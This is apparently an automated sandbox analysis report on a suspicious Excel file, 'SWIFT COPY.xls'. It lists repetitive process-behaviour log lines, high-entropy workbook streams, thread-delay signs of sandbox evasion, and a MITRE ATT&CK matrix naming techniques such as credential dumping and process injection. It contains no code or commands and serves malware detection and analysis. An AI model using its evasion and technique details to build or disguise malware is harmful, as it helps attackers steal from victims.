Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: SWIFT COPY.xlsStream path 'Workbook' entropy: 7.96388874982 (max. 8.0)
Source: 79760000.0.drStream path 'Workbook' entropy: 7.95156133439 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 381Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts3
Exploitation for Client Execution		1
Scripting		1
Process Injection		3
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection		LSA Secrets1
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.